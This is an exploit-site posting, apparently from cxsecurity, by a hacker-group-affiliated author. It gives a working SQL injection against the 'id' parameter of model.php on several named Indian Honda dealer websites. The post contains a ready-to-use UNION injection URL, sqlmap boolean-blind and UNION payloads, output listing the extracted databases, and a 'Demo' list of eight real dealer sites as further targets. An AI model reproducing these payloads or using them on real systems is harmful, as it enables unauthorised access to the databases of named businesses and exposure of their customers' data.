Honda India - Sql Injection

2021.07.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title: Honda - SQL Injection [+] Author: Hz3666Ghost [+] Contact me : t.me/Hz3666ghost [+] Thanx to : ======================= Indoghostsec - AnonGhost -Ghostsec - Anxsec Syndicate - Indonesian Fighter Cyber - Skullcybersec - rajawalisecteam - morrocanghost - and other ======================= [+] Exploit : http://www.superhonda.in/model.php?id=-graziasport_01%27%20union%20all%20select%201,2,3,4,5,6,database(),8--%20-&name=grazia125_sports SUPERSALES_DB --- Parameter: id (GET) Type: boolean-based blind Title: HAVING boolean-based blind - WHERE, GROUP BY clause Payload: id=graziasport_01' HAVING 2323=2323-- uiHt&name=grazia125_sports Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-3968' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qbkbq','ycHfCYHnEQRMgvltdtwfktnmrBQRhJOlvYTPSLBU'),'qzkjq')-- enPH&name=grazia125_sports --- ....... [14:36:18] [INFO] resumed: 'supersales_db' available databases [2]: [*] information_schema [*] supersales_db ======================= [+] Demo : https://imperialhonda.in/model.php?id=grazia125_01&name=grazia_125 http://www.shitalhonda.in/model.php?id=grazia125_01&name=grazia_125 http://www.royalhonda.in/model.php?id=grazia125_01&name=grazia_125 http://www.superhonda.in/model.php?id=graziasport_01&name=grazia125_sports https://gandhihonda.com/model.php?id=grazia125_01&name=grazia_125 http://harikrishnahonda.com/model.php?id=graziasport_01&name=grazia125_sports https://anjalihonda.com/model.php?id=grazia125_01&name=grazia_125 http://anamikahonda.com/model.php?id=graziasport_01&name=grazia125_sports


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top